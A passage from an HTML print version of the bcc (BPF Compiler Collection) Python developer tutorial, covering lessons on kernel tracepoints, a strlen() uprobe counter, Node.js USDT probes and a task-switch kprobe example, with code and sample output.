return 0;
|
||
}
|
||
""")
|
||
|
||
# header
|
||
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "GOTBITS"))
|
||
|
||
# format output
|
||
while 1:
|
||
try:
|
||
(task, pid, cpu, flags, ts, msg) = b.trace_fields()
|
||
except ValueError:
|
||
continue
|
||
print("%-18.9f %-16s %-6d %s" % (ts, task, pid, msg))
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>TRACEPOINT_PROBE(random, urandom_read)</code>: Instrument the kernel tracepoint <code>random:urandom_read</code>. These have a stable API, and thus are recommended for use instead of kprobes, wherever possible. You can run <code>perf list</code> for a list of tracepoints. Linux >= 4.7 is required to attach BPF programs to tracepoints.</li>
|
||
<li><code>args->got_bits</code>: <code>args</code> is auto-populated to be a structure of the tracepoint arguments. The comment above says where you can see that structure. For example:</li>
|
||
</ol>
|
||
<pre><code class="language-sh"># cat /sys/kernel/debug/tracing/events/random/urandom_read/format
|
||
name: urandom_read
|
||
ID: 972
|
||
format:
|
||
field:unsigned short common_type; offset:0; size:2; signed:0;
|
||
field:unsigned char common_flags; offset:2; size:1; signed:0;
|
||
field:unsigned char common_preempt_count; offset:3; size:1; signed:0;
|
||
field:int common_pid; offset:4; size:4; signed:1;
|
||
|
||
field:int got_bits; offset:8; size:4; signed:1;
|
||
field:int pool_left; offset:12; size:4; signed:1;
|
||
field:int input_left; offset:16; size:4; signed:1;
|
||
|
||
print fmt: "got_bits %d nonblocking_pool_entropy_left %d input_entropy_left %d", REC->got_bits, REC->pool_left, REC->input_left
|
||
</code></pre>
|
||
<p>In this case, we were printing the <code>got_bits</code> member.</p>
|
||
<h3 id="lesson-13-disksnooppy-fixed"><a class="header" href="#lesson-13-disksnooppy-fixed">Lesson 13. disksnoop.py fixed</a></h3>
|
||
<p>Convert disksnoop.py from a previous lesson to use the <code>block:block_rq_issue</code> and <code>block:block_rq_complete</code> tracepoints.</p>
|
||
<h3 id="lesson-14-strlen_countpy"><a class="header" href="#lesson-14-strlen_countpy">Lesson 14. strlen_count.py</a></h3>
|
||
<p>This program instruments a user-level function, the <code>strlen()</code> library function, and frequency counts its string argument. Example output:</p>
|
||
<pre><code class="language-sh"># strlen_count.py
|
||
Tracing strlen()... Hit Ctrl-C to end.
|
||
^C COUNT STRING
|
||
1 " "
|
||
1 "/bin/ls"
|
||
1 "."
|
||
1 "cpudist.py.1"
|
||
1 ".bashrc"
|
||
1 "ls --color=auto"
|
||
1 "key_t"
|
||
[...]
|
||
10 "a7:~# "
|
||
10 "/root"
|
||
12 "LC_ALL"
|
||
12 "en_US.UTF-8"
|
||
13 "en_US.UTF-8"
|
||
20 "~"
|
||
70 "#%^,~:-=?+/}"
|
||
340 "\x01\x1b]0;root@bgregg-test: ~\x07\x02root@bgregg-test:~# "
|
||
</code></pre>
|
||
<p>These are various strings that are being processed by this library function while tracing, along with their frequency counts. <code>strlen()</code> was called on "LC_ALL" 12 times, for example.</p>
|
||
<p>Code is <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/strlen_count.py">examples/tracing/strlen_count.py</a>:</p>
|
||
<pre><code class="language-Python">from __future__ import print_function
|
||
from bcc import BPF
|
||
from time import sleep
|
||
|
||
# load BPF program
|
||
b = BPF(text="""
|
||
#include <uapi/linux/ptrace.h>
|
||
|
||
struct key_t {
|
||
char c[80];
|
||
};
|
||
BPF_HASH(counts, struct key_t);
|
||
|
||
int count(struct pt_regs *ctx) {
|
||
if (!PT_REGS_PARM1(ctx))
|
||
return 0;
|
||
|
||
struct key_t key = {};
|
||
u64 zero = 0, *val;
|
||
|
||
bpf_probe_read_user(&key.c, sizeof(key.c), (void *)PT_REGS_PARM1(ctx));
|
||
// could also use `counts.increment(key)`
|
||
val = counts.lookup_or_try_init(&key, &zero);
|
||
if (val) {
|
||
(*val)++;
|
||
}
|
||
return 0;
|
||
};
|
||
""")
|
||
b.attach_uprobe(name="c", sym="strlen", fn_name="count")
|
||
|
||
# header
|
||
print("Tracing strlen()... Hit Ctrl-C to end.")
|
||
|
||
# sleep until Ctrl-C
|
||
try:
|
||
sleep(99999999)
|
||
except KeyboardInterrupt:
|
||
pass
|
||
|
||
# print output
|
||
print("%10s %s" % ("COUNT", "STRING"))
|
||
counts = b.get_table("counts")
|
||
for k, v in sorted(counts.items(), key=lambda counts: counts[1].value):
|
||
print("%10d \"%s\"" % (v.value, k.c.encode('string-escape')))
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>PT_REGS_PARM1(ctx)</code>: This fetches the first argument to <code>strlen()</code>, which is the string.</li>
|
||
<li><code>b.attach_uprobe(name="c", sym="strlen", fn_name="count")</code>: Attach to library "c" (if this is the main program, use its pathname), instrument the user-level function <code>strlen()</code>, and on execution call our C function <code>count()</code>.</li>
|
||
</ol>
|
||
<h3 id="lesson-15-nodejs_http_serverpy"><a class="header" href="#lesson-15-nodejs_http_serverpy">Lesson 15. nodejs_http_server.py</a></h3>
|
||
<p>This program instruments a user statically-defined tracing (USDT) probe, which is the user-level version of a kernel tracepoint. Sample output:</p>
|
||
<pre><code class="language-sh"># nodejs_http_server.py 24728
|
||
TIME(s) COMM PID ARGS
|
||
24653324.561322998 node 24728 path:/index.html
|
||
24653335.343401998 node 24728 path:/images/welcome.png
|
||
24653340.510164998 node 24728 path:/images/favicon.png
|
||
</code></pre>
|
||
<p>Relevant code from <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/nodejs_http_server.py">examples/tracing/nodejs_http_server.py</a>:</p>
|
||
<pre><code class="language-Python">from __future__ import print_function
|
||
from bcc import BPF, USDT
|
||
import sys
|
||
|
||
if len(sys.argv) < 2:
|
||
print("USAGE: nodejs_http_server PID")
|
||
exit()
|
||
pid = sys.argv[1]
|
||
debug = 0
|
||
|
||
# load BPF program
|
||
bpf_text = """
|
||
#include <uapi/linux/ptrace.h>
|
||
int do_trace(struct pt_regs *ctx) {
|
||
uint64_t addr;
|
||
char path[128]={0};
|
||
bpf_usdt_readarg(6, ctx, &addr);
|
||
bpf_probe_read_user(&path, sizeof(path), (void *)addr);
|
||
bpf_trace_printk("path:%s\\n", path);
|
||
return 0;
|
||
};
|
||
"""
|
||
|
||
# enable USDT probe from given PID
|
||
u = USDT(pid=int(pid))
|
||
u.enable_probe(probe="http__server__request", fn_name="do_trace")
|
||
if debug:
|
||
print(u.get_text())
|
||
print(bpf_text)
|
||
|
||
# initialize BPF
|
||
b = BPF(text=bpf_text, usdt_contexts=[u])
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>bpf_usdt_readarg(6, ctx, &addr)</code>: Read the address of argument 6 from the USDT probe into <code>addr</code>.</li>
|
||
<li><code>bpf_probe_read_user(&path, sizeof(path), (void *)addr)</code>: Now read the string that <code>addr</code> points to into our <code>path</code> variable.</li>
|
||
<li><code>u = USDT(pid=int(pid))</code>: Initialize USDT tracing for the given PID.</li>
|
||
<li><code>u.enable_probe(probe="http__server__request", fn_name="do_trace")</code>: Attach our <code>do_trace()</code> BPF C function to the Node.js <code>http__server__request</code> USDT probe.</li>
|
||
<li><code>b = BPF(text=bpf_text, usdt_contexts=[u])</code>: Need to pass in our USDT object, <code>u</code>, to BPF object creation.</li>
|
||
</ol>
|
||
<h3 id="lesson-16-task_switchc"><a class="header" href="#lesson-16-task_switchc">Lesson 16. task_switch.c</a></h3>
|
||
<p>This is an older tutorial included as a bonus lesson. Use this for recap and to reinforce what you've already learned.</p>
|
||
<p>This is a slightly more complex tracing example than Hello World. This program
|
||
will be invoked for every task change in the kernel, and record in a BPF map
|
||
the new and old pids.</p>
|
||
<p>The C program below introduces a new concept: the prev argument. This
|
||
argument is treated specially by the BCC frontend, such that accesses
|
||
to this variable are read from the saved context that is passed by the
|
||
kprobe infrastructure. The prototype of the args starting from
|
||
position 1 should match the prototype of the kernel function being
|
||
kprobed. If done so, the program will have seamless access to the
|
||
function parameters.</p>
|
||
<pre><code class="language-c">#include <uapi/linux/ptrace.h>
|
||
#include <linux/sched.h>
|
||
|
||
struct key_t {
|
||
u32 prev_pid;
|
||
u32 curr_pid;
|
||
};
|
||
|
||
BPF_HASH(stats, struct key_t, u64, 1024);
|
||
int count_sched(struct pt_regs *ctx, struct task_struct *prev) {
|
||
struct key_t key = {};
|
||
u64 zero = 0, *val;
|
||
|
||
key.curr_pid = bpf_get_current_pid_tgid();
|
||
key.prev_pid = prev->pid;
|
||
|
||
// could also use `stats.increment(key);`
|
||
val = stats.lookup_or_try_init(&key, &zero);
|
||
if (val) {
|
||
(*val)++;
|
||
}
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>The userspace component loads the file shown above, and attaches it to the
|
||
<code>finish_task_switch</code> kernel function.
|
||
The <code>[]</code> operator of the BPF object gives access to each BPF_HASH in the
|
||
program, allowing pass-through access to the values residing in the kernel. Use
|
||
the object as you would any other Python dict object: reads, updates, and deletes
|
||
are all allowed.</p>
|
||
<pre><code class="language-python">from bcc import BPF
|
||
from time import sleep
|
||
|
||
b = BPF(src_file="task_switch.c")
|
||
b.attach_kprobe(event="finish_task_switch", fn_name="count_sched")
|
||
|
||
# generate many schedule events
|
||
for i in range(0, 100): sleep(0.01)
|
||
|
||
for k, v in b["stats"].items():
|
||
print("task_switch[%5d->%5d]=%u" % (k.prev_pid, k.curr_pid, v.value))
|
||
</code></pre>
|
||
<p>These programs can be found in the files <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/task_switch.c">examples/tracing/task_switch.c</a> and <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/task_switch.py">examples/tracing/task_switch.py</a> respectively.</p>
|
||
<h3 id="lesson-17-further-study"><a class="header" href="#lesson-17-further-study">Lesson 17. Further Study</a></h3>
|
||
<p>For further study, see Sasha Goldshtein's <a href="https://github.com/goldshtn/linux-tracing-workshop">linux-tracing-workshop</a>, which contains additional labs. There are also many tools in the bcc <code>/tools</code> directory to study.</p>
|
||
<p>Please read <a href="https://github.com/iovisor/bcc/tree/master/CONTRIBUTING-SCRIPTS.md">CONTRIBUTING-SCRIPTS.md</a> if you wish to contribute tools to bcc. At the bottom of the main <a href="https://github.com/iovisor/bcc/tree/master/README.md">README.md</a>, you'll also find methods for contacting us. Good luck, and happy tracing!</p>
|
||
<h2 id="networking-1"><a class="header" href="#networking-1">Networking</a></h2>
|
||
<p>To do.</p>
|
||
|
||
</main>
|
||
|
||
<nav class="nav-wrapper" aria-label="Page navigation">
|
||
<!-- Mobile navigation buttons -->
|
||
|
||
|
||
<div style="clear: both"></div>
|
||
</nav>
|
||
</div>
|
||
</div>
|
||
|
||
<nav class="nav-wide-wrapper" aria-label="Page navigation">
|
||
|
||
</nav>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
<script>
|
||
window.playground_copyable = true;
|
||
</script>
|
||
|
||
|
||
<script src="elasticlunr.min.js"></script>
|
||
<script src="mark.min.js"></script>
|
||
<script src="searcher.js"></script>
|
||
|
||
<script src="clipboard.min.js"></script>
|
||
<script src="highlight.js"></script>
|
||
<script src="book.js"></script>
|
||
|
||
<!-- Custom JS scripts -->
|
||
|
||
<script>
|
||
window.addEventListener('load', function() {
|
||
window.setTimeout(window.print, 100);
|
||
});
|
||
</script>
|
||
|
||
</div>
|
||
</body>
|
||
</html>
|